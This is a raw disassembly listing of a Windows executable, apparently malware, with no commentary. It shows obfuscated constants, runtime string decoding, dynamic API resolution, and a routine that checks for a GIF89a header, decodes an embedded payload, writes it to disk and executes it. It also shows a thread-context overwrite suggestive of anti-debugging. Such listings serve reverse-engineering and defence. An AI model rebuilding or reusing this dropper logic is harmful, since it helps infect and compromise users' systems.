var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
inc esi
movsx edi, word ptr ds:10013208h
mov eax, esi
test eax, eax
jge short loc_41B00F
add eax, 0FFh
loc_41B00F: ; CODE XREF: sub_41AFF0+18�j
sar eax, 8
mov ebx, eax
imul ebx, ds:10013128h
lea edi, [edi+ebx+1Ah]
mov [ebp+var_8], edi
mov edi, ds:10013280h
add edi, 11h
mov eax, esi
test eax, eax
jge short loc_41B036
add eax, 0FFh
loc_41B036: ; CODE XREF: sub_41AFF0+3F�j
sar eax, 8
mov ebx, ds:10013270h
add ebx, 0Dh
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_C], edi
mov edi, ds:10013254h
add edi, 18h
mov eax, esi
test eax, eax
jge short loc_41B060
add eax, 0FFFFh
loc_41B060: ; CODE XREF: sub_41AFF0+69�j
sar eax, 10h
mov ebx, ds:10013138h
add ebx, 17h
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_10], edi
mov eax, esi
mul [ebp+var_8]
mov [ebp+var_1C], eax
and eax, 0FFh
push eax
call sub_419767
mov ebx, eax
mov [ebp+var_1], bl
mov eax, ds:10013134h
add eax, ds:10013220h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41D699
mov ebx, eax
mov [ebp+var_11], bl
mov eax, esi
mul [ebp+var_C]
mov [ebp+var_20], eax
and eax, 0FFh
push eax
call sub_419767
mov ebx, eax
mov [ebp+var_12], bl
mov eax, ds:100131A0h
add eax, 6Eh
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41D699
mov ebx, eax
mov [ebp+var_13], bl
mov eax, esi
and eax, 0FFh
push eax
call sub_419767
mov ebx, eax
mov [ebp+var_14], bl
mov eax, ds:100131ACh
add eax, 2Ah
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41D699
mov ebx, eax
mov [ebp+var_15], bl
mov eax, esi
mul [ebp+var_10]
mov [ebp+var_24], eax
and eax, 0FFh
push eax
call sub_419767
mov ebx, eax
mov [ebp+var_16], bl
mov eax, ds:1001314Ch
add eax, 40h
movsx edx, word ptr ds:10013100h
add eax, edx
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41D699
mov ebx, eax
mov [ebp+var_17], bl
movsx eax, word ptr ds:10013240h
add eax, 41h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_419767
add esp, 24h
mov ebx, eax
mov [ebp+var_18], bl
movzx edi, [ebp+var_1]
mov eax, edi
shr eax, 1
mov esi, ds:1001319Ch
add esi, ds:1001312Ch
sub esi, 0Ch
mul esi
mov [ebp+var_28], eax
mov esi, eax
cmp esi, edi
jnz short loc_41B1E4
push 10014356h
call sub_41C914
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call dword ptr ds:10012634h
add esp, 30h
jmp short loc_41B228
; ---------------------------------------------------------------------------
loc_41B1E4: ; CODE XREF: sub_41AFF0+1AC�j
push 1001433Bh
call sub_41C914
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call dword ptr ds:10012634h
add esp, 30h
loc_41B228: ; CODE XREF: sub_41AFF0+1F2�j
pop edi
pop esi
pop ebx
leave
retn
sub_41AFF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B22D proc near ; CODE XREF: .data:0041F921�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
mov esi, [ebp+arg_8]
mov eax, ebx
add eax, 2
mov ecx, 3
mov edx, 0AAAAAAABh
mul edx
shr edx, 1
mov [ebp+var_4], edx
mov edi, edx
shl edi, 2
mov edx, [ebp+arg_C]
dec edx
cmp edi, edx
jbe short loc_41B2A0
xor eax, eax
jmp loc_41B34F
; ---------------------------------------------------------------------------
loc_41B265: ; CODE XREF: sub_41B22D+83�j
push esi
push [ebp+arg_0]
call sub_41FD3F
add esp, 8
mov eax, ds:10013268h
dec eax
sub ebx, eax
mov eax, ds:10013274h
add eax, ds:10013278h
add eax, [ebp+arg_0]
mov [ebp+arg_0], eax
movsx eax, word ptr ds:10013208h
movsx edx, word ptr ds:10013144h
add eax, edx
sub eax, 7
lea esi, [esi+eax]
loc_41B2A0: ; CODE XREF: sub_41B22D+2F�j
mov eax, ds:1001312Ch
add eax, ds:100131A8h
sub eax, 7
cmp ebx, eax
jnb short loc_41B265
movsx eax, word ptr ds:100130E8h
dec eax
cmp ebx, eax
jbe short loc_41B32F
push 3
movsx eax, word ptr ds:10013100h
movsx edx, word ptr ds:10013218h
add eax, edx
sub eax, 8
push eax
lea eax, [ebp+var_7]
push eax
call dword ptr ds:10011644h
push ebx
push [ebp+arg_0]
lea eax, [ebp+var_7]
push eax
call dword ptr ds:10011638h
push esi
lea eax, [ebp+var_7]
push eax
call sub_41FD3F
add esp, 20h
mov eax, ds:1001317Ch
movsx edx, word ptr ds:1001327Ch
add eax, edx
sub eax, 6
mov byte ptr [esi+eax], 3Dh
mov eax, ds:1001312Ch
sub eax, 7
cmp ebx, eax
jnz short loc_41B324
mov eax, ds:10013274h
inc eax
mov byte ptr [esi+eax], 3Dh
loc_41B324: ; CODE XREF: sub_41B22D+EB�j
mov eax, ds:1001312Ch
sub eax, 4
lea esi, [esi+eax]
loc_41B32F: ; CODE XREF: sub_41B22D+8F�j
mov eax, ds:10013238h
movsx edx, word ptr ds:100130A4h
add eax, edx
sub eax, 6
mov edx, ds:10013244h
sub edx, 4
mov [esi+eax], dl
xor eax, eax
inc eax
loc_41B34F: ; CODE XREF: sub_41B22D+33�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B22D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B354 proc near ; CODE XREF: sub_41BE82+22E�p
; sub_41BE82+240�p
var_61DA0 = dword ptr -61DA0h
var_61D9C = dword ptr -61D9Ch
var_61D98 = byte ptr -61D98h
var_61C99 = byte ptr -61C99h
var_61C98 = dword ptr -61C98h
var_61C91 = byte ptr -61C91h
var_30F51 = byte ptr -30F51h
var_30F50 = dword ptr -30F50h
var_30F4B = byte ptr -30F4Bh
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30E3E = byte ptr -30E3Eh
var_30E3D = byte ptr -30E3Dh
var_30E3C = byte ptr -30E3Ch
var_30E3B = byte ptr -30E3Bh
var_30E3A = byte ptr -30E3Ah
var_30E15 = byte ptr -30E15h
var_30E14 = byte ptr -30E14h
var_30DC4 = byte ptr -30DC4h
var_30DBE = byte ptr -30DBEh
var_30DBD = byte ptr -30DBDh
var_30DBC = byte ptr -30DBCh
var_30D4E = byte ptr -30D4Eh
var_30D46 = byte ptr -30D46h
var_30D43 = byte ptr -30D43h
var_30D40 = byte ptr -30D40h
var_30D3F = byte ptr -30D3Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 61DA0h
call sub_423379
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
and [ebp+var_30F50], 0
push 0
mov eax, ds:10013244h
movsx edx, word ptr ds:100130FCh
add eax, edx
sub eax, 0Ah
push eax
push 3
push 0
mov eax, ds:10013094h
sub eax, 6
push eax
push 80000000h
push [ebp+arg_0]
call dword ptr ds:10012788h
mov [ebp+var_30E48], eax
cmp eax, 0FFFFFFFFh
jz loc_41B7D4
push 0
lea eax, [ebp+var_30E4C]
push eax
mov eax, ds:10013108h
add eax, 7Eh
add eax, ds:100130C8h
push eax
lea eax, [ebp+var_30E3F]
push eax
push [ebp+var_30E48]
call dword ptr ds:1000D028h
mov [ebp+var_30E44], eax
movsx eax, word ptr ds:1001316Ch
dec eax
cmp [ebp+var_30E44], eax
jz loc_41B7B6
cmp [ebp+var_30E3F], 47h
jnz short loc_41B427
cmp [ebp+var_30E3E], 49h
jnz short loc_41B427
cmp [ebp+var_30E3D], 46h
jnz short loc_41B427
cmp [ebp+var_30E3C], 38h
jnz short loc_41B427
cmp [ebp+var_30E3B], 39h
jnz short loc_41B427
cmp [ebp+var_30E3A], 61h
jz short loc_41B42C
loc_41B427: ; CODE XREF: sub_41B354+A4�j
; sub_41B354+AD�j ...
jmp loc_41B7B6
; ---------------------------------------------------------------------------
loc_41B42C: ; CODE XREF: sub_41B354+D1�j
movzx eax, [ebp+var_30E15]
movsx edx, word ptr ds:100131DCh
mov ecx, ds:10013164h
lea edx, [edx+ecx+36h]
cmp eax, edx
jnz short loc_41B45A
cmp [ebp+var_30DBE], 3Dh
jnz short loc_41B45A
cmp [ebp+var_30DBD], 3Dh
jz short loc_41B45F
loc_41B45A: ; CODE XREF: sub_41B354+F2�j
; sub_41B354+FB�j
jmp loc_41B7B6
; ---------------------------------------------------------------------------
loc_41B45F: ; CODE XREF: sub_41B354+104�j
or ebx, ebx
jnz short loc_41B48E
mov al, [ebp+var_30DBC]
mov [ebp+var_30F51], al
call sub_4211B3
mov edx, eax
mov [ebp+var_61C99], dl
mov al, [ebp+var_61C99]
cmp al, [ebp+var_30F51]
jz loc_41B7B6
loc_41B48E: ; CODE XREF: sub_41B354+10D�j
push 0
lea eax, [ebp+var_30E4C]
push eax
push 30D40h
lea eax, [ebp+var_61C91]
push eax
push [ebp+var_30E48]
call dword ptr ds:1000D028h
mov [ebp+var_30E44], eax
mov eax, ds:10013094h
sub eax, 6
cmp [ebp+var_30E44], eax
jz loc_41B7B6
mov eax, [ebp+var_30E4C]
mov edx, ds:10013110h
add edx, ds:10013268h
sub edx, 9
mov [ebp+eax+var_61C91], dl
push 30D40h
lea eax, [ebp+var_30D40]
push eax
lea eax, [ebp+var_61C91]
push eax
call sub_418755
add esp, 0Ch
mov esi, eax
mov eax, ds:10013184h
mov edi, eax
add edi, ds:10013210h
sub edi, 3
jmp short loc_41B559
; ---------------------------------------------------------------------------
loc_41B514: ; CODE XREF: sub_41B354+207�j
or ebx, ebx
jz short loc_41B52B
movzx eax, [ebp+edi+var_30D40]
sub eax, edi
mov [ebp+edi+var_30D40], al
jmp short loc_41B558
; ---------------------------------------------------------------------------
loc_41B52B: ; CODE XREF: sub_41B354+1C2�j
movzx eax, [ebp+edi+var_30D40]
mov [ebp+var_61D9C], eax
mov eax, edi
mul edi
mov [ebp+var_61DA0], eax
mov eax, [ebp+var_61D9C]
mov edx, [ebp+var_61DA0]
sub eax, edx
mov [ebp+edi+var_30D40], al
loc_41B558: ; CODE XREF: sub_41B354+1D5�j
inc edi
loc_41B559: ; CODE XREF: sub_41B354+1BE�j
cmp edi, esi
jb short loc_41B514
or ebx, ebx
jz short loc_41B57A
mov eax, ds:10013254h
sub eax, 8
mov edx, esi
sub edx, eax
mov eax, ds:10013274h
dec eax
mov [ebp+edx+var_30D40], al
loc_41B57A: ; CODE XREF: sub_41B354+20B�j
movsx eax, word ptr ds:10013104h
mov edx, ds:100130A0h
movsx ecx, word ptr ds:100130E8h
add edx, ecx
sub edx, 5
mov [ebp+eax+var_30DC4], dl
push 0FFh
lea eax, [ebp+var_61D98]
push eax
lea eax, [ebp+var_30E14]
push eax
call sub_418755
lea eax, [ebp+var_61D98]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
call sub_41C6CD
add esp, 18h
mov [ebp+var_30E44], eax
mov eax, ds:1001309Ch
sub eax, 5
cmp [ebp+var_30E44], eax
jnz loc_41B7B6
mov [ebp+var_30F50], 1
or ebx, ebx
jz loc_41B713
mov eax, ds:1001325Ch
add eax, ds:1001319Ch
cmp [ebp+eax+var_30D4E], 64h
jnz short loc_41B683
movzx eax, [ebp+var_30D3F]
movsx edx, word ptr ds:100131FCh
add edx, 1Bh
sub eax, edx
mov byte ptr [ebp+var_61D9C+3], al
movzx eax, byte ptr [ebp+var_61D9C+3]
push eax
push 0
call sub_42091E
mov eax, ds:1001325Ch
sub eax, 8
mov ds:1000F620h, eax
mov eax, ds:100130ACh
dec eax
mov ds:10013350h, eax
mov eax, ds:10013148h
movsx edx, word ptr ds:100130C0h
sub edx, 2
mov [ebp+eax+var_30D40], dl
movsx eax, word ptr ds:1001316Ch
movsx edx, word ptr ds:100130D0h
add eax, edx
sub eax, 7
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_41DCEB
add esp, 10h
loc_41B683: ; CODE XREF: sub_41B354+2B4�j
mov eax, ds:100130A8h
cmp [ebp+eax+var_30D46], 67h
jnz loc_41B7B6
movsx eax, word ptr ds:10013144h
movsx edx, word ptr ds:100130D0h
add eax, edx
mov edx, ds:10013128h
sub edx, 9
mov [ebp+eax+var_30D43], dl
lea eax, [ebp+var_30D3F]
push eax
call dword ptr ds:1000D054h
mov [ebp+var_61D9C], eax
push eax
push 10012670h
call sub_41AFF0
mov eax, ds:100130F0h
dec eax
mov ds:1000F620h, eax
movsx eax, word ptr ds:100130FCh
sub eax, 6
mov ds:10013350h, eax
movsx eax, word ptr ds:10013144h
add eax, ds:10013204h
sub eax, 6
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_41DCEB
add esp, 14h
jmp loc_41B7B6
; ---------------------------------------------------------------------------
loc_41B713: ; CODE XREF: sub_41B354+29B�j
movsx eax, word ptr ds:10013098h
add eax, 5
push eax
lea eax, [ebp+var_30F4B]
push eax
call sub_41F760
push 10014333h
call sub_41C914
push eax
lea edx, [ebp+var_30F4B]
push edx
call dword ptr ds:1000D020h
push 0
push 80h
push 2
push 0
mov eax, ds:10013090h
sub eax, 3
push eax
push 40000000h
lea eax, [ebp+var_30F4B]
push eax
call dword ptr ds:10012788h
mov [ebp+var_61C98], eax
push 0
lea eax, [ebp+var_30E4C]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
push [ebp+var_61C98]
call dword ptr ds:10012B8Ch
push [ebp+var_61C98]
call dword ptr ds:10011654h
push 5
lea eax, [ebp+var_30F4B]
push eax
call dword ptr ds:1000F0E0h
movzx eax, [ebp+var_30F51]
push eax
call sub_41BD8F
add esp, 18h
loc_41B7B6: ; CODE XREF: sub_41B354+97�j
; sub_41B354:loc_41B427�j ...
push [ebp+var_30E48]
call dword ptr ds:10011654h
cmp [ebp+var_30F50], 0
jz short loc_41B7D4
push [ebp+arg_0]
call dword ptr ds:1000D008h
loc_41B7D4: ; CODE XREF: sub_41B354+52�j
; sub_41B354+475�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B354 endp
; =============== S U B R O U T I N E =======================================
sub_41B7D9 proc near ; CODE XREF: .data:0041F02D�p
push edi
push 10014326h
call sub_41C914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132A4h, eax
test eax, eax
jnz short loc_41B80C
push 10014319h
call sub_41C914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132A4h, eax
loc_41B80C: ; CODE XREF: sub_41B7D9+1A�j
push 10014306h
call sub_41C914
push eax
push dword ptr ds:100132A4h
call dword ptr ds:1000F1F8h
mov ds:10012BB4h, eax
push 100142F2h
call sub_41C914
push eax
push dword ptr ds:100132A4h
call dword ptr ds:1000F1F8h
mov ds:1000F624h, eax
push 100142E2h
call sub_41C914
push eax
push dword ptr ds:100132A4h
call dword ptr ds:1000F1F8h
mov ds:1000F0D0h, eax
push 100142D0h
call sub_41C914
push eax
push dword ptr ds:100132A4h
call dword ptr ds:1000F1F8h
mov ds:1000F0D8h, eax
push 100142C1h
call sub_41C914
add esp, 14h
push eax
push dword ptr ds:100132A4h
call dword ptr ds:1000F1F8h
mov ds:10012648h, eax
pop edi
retn
sub_41B7D9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
pusha
mov esi, [ebp+10h]
mov eax, 10004A5Ch
mov [esi+0B8h], eax
mov eax, [ebp+0Ch]
mov [esi+0C4h], eax
popa
mov esp, ebp
pop ebp
xor eax, eax
retn
; ---------------------------------------------------------------------------
db 0C3h
; =============== S U B R O U T I N E =======================================
sub_41B8C0 proc near ; CODE XREF: .data:0041F028�p
push edi
push 100142B4h
call sub_41C914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132A0h, eax
test eax, eax
jnz short loc_41B8F3
push 100142A7h
call sub_41C914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132A0h, eax
loc_41B8F3: ; CODE XREF: sub_41B8C0+1A�j
push 10014298h
call sub_41C914
push eax
push dword ptr ds:100132A0h
call dword ptr ds:1000F1F8h
mov ds:10010250h, eax
push 10014286h
call sub_41C914
add esp, 8
push eax
push dword ptr ds:100132A0h
call dword ptr ds:1000F1F8h
mov ds:1000E120h, eax
pop edi
retn
sub_41B8C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B930 proc near ; CODE XREF: sub_420477+142�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_423379
push ebx
push esi
push edi
mov eax, ds:100131F4h
sub eax, 4
push eax
lea eax, [ebp+var_FFF]
push eax
call sub_42091E
add esp, 8
movsx edi, word ptr ds:10013100h
sub edi, 3
jmp short loc_41B97E
; ---------------------------------------------------------------------------
loc_41B964: ; CODE XREF: sub_41B930+54�j
cmp [ebp+edi+var_FFF], 23h
jnz short loc_41B97D
mov eax, ds:10013288h
sub eax, 6
mov [ebp+edi+var_FFF], al
loc_41B97D: ; CODE XREF: sub_41B930+3C�j
inc edi
loc_41B97E: ; CODE XREF: sub_41B930+32�j
cmp edi, 0FFFh
jb short loc_41B964
lea esi, [ebp+var_FFF]
loc_41B98C: ; CODE XREF: sub_41B930+EC�j
push 10014282h
call sub_41C914
push 1000E020h
mov ebx, ds:10013134h
movsx edx, word ptr ds:100130B0h
add ebx, edx
sub ebx, 0Fh
push ebx
mov ebx, ds:1001320Ch
movsx edx, word ptr ds:10013250h
add ebx, edx
sub ebx, 7
push ebx
push eax
mov ebx, ds:10013224h
sub ebx, 5
push ebx
push 0
push esi
push [ebp+arg_0]
mov ebx, ds:100131D4h
add ebx, ds:100131C4h
sub ebx, 5
and ebx, 0FFh
push ebx
call sub_41D465
add esp, 28h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41B9F5: ; CODE XREF: sub_41B930+CA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41B9F5
movsx edx, word ptr ds:100131E0h
sub edx, 2
mov ebx, eax
add ebx, esi
mov esi, edx
add esi, ebx
movsx eax, byte ptr [esi]
mov edx, ds:1001325Ch
sub edx, 8
cmp eax, edx
jnz loc_41B98C
pop edi
pop esi
pop ebx
leave
retn
sub_41B930 endp
; ---------------------------------------------------------------------------
db 0B8h
dd 80004001h
db 0C2h, 10h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA2F proc near ; CODE XREF: sub_420477+1A1�p
; sub_420477+1C2�p
var_4F = byte ptr -4Fh
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call dword ptr ds:10012770h
mov [ebp+var_8], eax
mov esi, ds:10013140h
sub esi, 9
jmp short loc_41BA96
; ---------------------------------------------------------------------------
loc_41BA4F: ; CODE XREF: sub_41BA2F+79�j
cmp dword ptr ds:1000E130h[esi*4], 0
jz short loc_41BA95
mov edx, ds:10011660h[esi*4]
mov ecx, ds:100130C8h
add ecx, 0EA5Fh
movsx eax, word ptr ds:100130E8h
add ecx, eax
mov eax, ds:100130A8h
add eax, ds:100131E8h
sub eax, 2
imul ecx, eax
add edx, ecx
cmp edx, [ebp+var_8]
jnb short loc_41BA95
and dword ptr ds:1000E130h[esi*4], 0
loc_41BA95: ; CODE XREF: sub_41BA2F+28�j
; sub_41BA2F+5C�j
inc esi
loc_41BA96: ; CODE XREF: sub_41BA2F+1E�j
mov eax, ds:100130F0h
add eax, 3E4h
add eax, ds:1001313Ch
cmp esi, eax
jb short loc_41BA4F
loc_41BAAA: ; CODE XREF: sub_41BA2F+99�j
; sub_41BA2F+281�j
mov eax, [ebx]
mov [ebp+var_14], eax
lea ebx, [ebx+eax]
mov eax, ebx
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb loc_41BCB6
mov eax, ds:10013244h
cmp [ebp+var_14], eax
ja short loc_41BAAA
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_41BACF: ; CODE XREF: sub_41BA2F+A5�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41BACF
mov [ebp+var_10], eax
mov eax, ebx
sub eax, [ebp+arg_0]
movsx edx, word ptr ds:10013264h
add edx, ds:10013204h
sub edx, 6
sub eax, edx
mov [ebp+var_C], eax
mov [ebp+var_1], 44h
mov eax, ds:10013204h
sub eax, 1
cmp byte ptr [ebx+eax], 2Ah
jnz short loc_41BB09
mov [ebp+var_1], 43h
loc_41BB09: ; CODE XREF: sub_41BA2F+D4�j
mov edi, ds:100130ECh
sub edi, 4
jmp short loc_41BB3B
; ---------------------------------------------------------------------------
loc_41BB14: ; CODE XREF: sub_41BA2F+121�j
cmp dword ptr ds:1000E130h[edi*4], 0
jz short loc_41BB3A
mov edx, [ebp+var_C]
cmp ds:1000D060h[edi*4], edx
jnz short loc_41BB3A
mov dl, ds:1000F200h[edi]
cmp dl, [ebp+var_1]
jz loc_41BC95
loc_41BB3A: ; CODE XREF: sub_41BA2F+ED�j
; sub_41BA2F+F9�j
inc edi
loc_41BB3B: ; CODE XREF: sub_41BA2F+E3�j
mov eax, ds:10013194h
add eax, 3D9h
movsx edx, word ptr ds:100130FCh
add eax, edx
cmp edi, eax
jb short loc_41BB14
mov eax, ds:10013168h
add eax, 3BEh
movsx edx, word ptr ds:10013260h
add eax, edx
cmp [ebp+var_10], eax
jbe loc_41BC3E
mov eax, ds:100130F8h
add eax, 7
movsx edx, word ptr ds:1001316Ch
add eax, edx
push eax
lea eax, [ebp+var_4F]
push eax
call sub_41F760
add esp, 8
mov eax, ds:100130ACh
add eax, 3BFh
mov [ebp+var_18], eax
movsx eax, word ptr ds:100130FCh
add eax, ds:100131F8h
sub eax, 9
mov [ebp+var_1C], eax
loc_41BBAC: ; CODE XREF: sub_41BA2F+20A�j
mov eax, [ebp+var_18]
mov al, [ebx+eax]
mov [ebp+var_1D], al
mov eax, [ebp+var_18]
mov edx, ds:10013114h
movsx ecx, word ptr ds:100131B4h
add edx, ecx
sub edx, 0Ch
mov [ebx+eax], dl
push 1000E020h
push [ebp+var_10]
push [ebp+var_1C]
lea eax, [ebp+var_4F]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
mov eax, ds:100131ECh
add eax, ds:100130A0h
sub eax, 0Ch
and eax, 0FFh
push eax
call sub_41D465
add esp, 24h
mov eax, [ebp+var_18]
mov dl, [ebp+var_1D]
mov [ebx+eax], dl
mov [ebp+var_1C], eax
mov eax, ds:100131B0h
add eax, 3B6h
movsx edx, word ptr ds:10013118h
add eax, edx
add [ebp+var_18], eax
mov eax, [ebp+var_10]
cmp [ebp+var_18], eax
jbe short loc_41BC31
mov [ebp+var_18], eax
loc_41BC31: ; CODE XREF: sub_41BA2F+1FD�j
mov eax, [ebp+var_10]
cmp [ebp+var_1C], eax
jnb short loc_41BC90
jmp loc_41BBAC
; ---------------------------------------------------------------------------
loc_41BC3E: ; CODE XREF: sub_41BA2F+139�j
push 1001427Dh
call sub_41C914
push 1000E020h
push [ebp+var_10]
movsx edx, word ptr ds:10013100h
add edx, ds:100131F8h
sub edx, 6
push edx
push eax
mov edx, [ebp+arg_C]
push dword ptr [edx]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
movsx edx, word ptr ds:100130FCh
movsx ecx, word ptr ds:100130D0h
add edx, ecx
sub edx, 0Dh
and edx, 0FFh
push edx
call sub_41D465
add esp, 28h
loc_41BC90: ; CODE XREF: sub_41BA2F+208�j
mov eax, [ebp+arg_C]
inc dword ptr [eax]
loc_41BC95: ; CODE XREF: sub_41BA2F+105�j
mov eax, [ebp+var_10]
lea ebx, [ebx+eax]
inc ebx
mov eax, [ebp+arg_C]
mov edx, ds:100131F8h
add edx, 0Bh
add edx, ds:10013094h
cmp [eax], edx
jbe loc_41BAAA
loc_41BCB6: ; CODE XREF: sub_41BA2F+8B�j
push 10014279h
call sub_41C914
push 1000E020h
movsx edx, word ptr ds:100131F0h
movsx ecx, word ptr ds:1001327Ch
add edx, ecx
sub edx, 7
push edx
movsx edx, word ptr ds:10013170h
sub edx, 2
push edx
push eax
mov edx, ds:10013140h
add edx, ds:10013244h
sub edx, 0Dh
push edx
push 0
push 0
push [ebp+arg_8]
mov edx, ds:100131ACh
add edx, ds:10013210h
sub edx, 5
and edx, 0FFh
push edx
call sub_41D465
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_41BA2F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 2000h
call sub_423379
push esi
push edi
push 1FFFh
lea eax, [ebp-1FFFh]
push eax
push dword ptr [ebp+8]
call dword ptr ds:10012BA4h
push 10014264h
call sub_41C914
mov edi, ds:10013224h
add edi, ds:10013134h
sub edi, 0Ch
push edi
push eax
lea edi, [ebp-1FFFh]
push edi
call sub_4188C2
add esp, 10h
mov esi, ds:10013198h
add esi, 0FFFDh
cmp eax, esi
jz short loc_41BD86
push dword ptr [ebp+8]
call sub_4197BE
pop ecx
loc_41BD86: ; CODE XREF: .data:0041BD7B�j
xor eax, eax
inc eax
pop edi
pop esi
leave
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD8F proc near ; CODE XREF: sub_41B354+45A�p
var_270 = byte ptr -270h
var_26C = byte ptr -26Ch
var_267 = byte ptr -267h
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 26Ch
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000F600h
lea eax, [ebp+var_168]
push eax
call sub_41FC67
push 1001425Fh
call sub_41C914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000D020h
push 10014257h
call sub_41C914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
add esp, 24h
movsx eax, word ptr ds:10013124h
add eax, ds:100131A0h
mov dl, [ebp+arg_0]
mov [ebp+eax+var_270], dl
push 0
push 80h
push 4
push 0
movsx eax, word ptr ds:10013170h
sub eax, 2
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10012788h
mov edi, eax
push 0
lea eax, [ebp+var_26C]
push eax
mov eax, ds:10013248h
inc eax
push eax
lea eax, [ebp+var_267]
push eax
push edi
call dword ptr ds:10012B8Ch
push edi
call dword ptr ds:10011654h
pop edi
pop esi
leave
retn
sub_41BD8F endp
; ---------------------------------------------------------------------------
db 0A1h, 0E4h, 31h
dd 0BF0F1001h, 131E015h, 83D00110h, 0FF5006E8h, 1266415h
db 10h, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE82 proc near ; CODE XREF: sub_41BE82+299�p
; sub_41BE82+307�p ...
var_268 = byte ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = word ptr -258h
var_256 = word ptr -256h
var_252 = word ptr -252h
var_250 = word ptr -250h
var_24E = word ptr -24Eh
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
arg_18 = byte ptr 20h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 268h
push ebx
push esi
push edi
push 0
call dword ptr ds:10012630h
xor ebx, ebx
inc ebx
push 1001424Fh
call sub_41C914
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10012634h
add esp, 14h
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call dword ptr ds:10010258h
mov [ebp+var_248], eax
mov eax, ds:10013128h
movsx edx, word ptr ds:10013180h
add eax, edx
sub eax, 0Ch
neg eax
cmp [ebp+var_248], eax
jnz loc_41C0CF
movsx eax, word ptr ds:100131B4h
sub eax, 4
cmp [ebp+arg_20], eax
ja loc_41C198
movsx eax, word ptr ds:10013170h
